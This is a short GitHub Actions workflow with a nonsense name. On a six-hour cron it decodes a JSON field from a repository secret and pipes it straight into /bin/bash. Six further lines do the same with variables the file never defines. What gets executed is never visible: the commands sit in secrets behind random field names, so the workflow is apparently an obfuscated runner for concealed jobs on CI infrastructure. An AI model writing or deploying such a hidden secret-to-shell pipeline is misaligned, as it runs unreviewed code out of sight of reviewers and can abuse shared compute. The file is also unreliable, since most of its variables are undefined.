name: hugouhuohuang

on:
  workflow_dispatch:
  schedule:
    - cron: '7 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hugouhuohuang
        env:
          zd23: ${{ secrets.zd23 }}
        run: |
          echo $zd23 | jq -r .duqax144 | /bin/bash
          echo $rtns49916 | jq -r .by0888 | /bin/bash
          echo $h662 | jq -r .jrfi017 | /bin/bash
          echo $nzbm73 | jq -r .dfeo456 | /bin/bash
          echo $jvizn5 | jq -r .sx9024 | /bin/bash
          echo $yg2525 | jq -r .jew7 | /bin/bash
          echo $a251 | jq -r .ku21 | /bin/bash

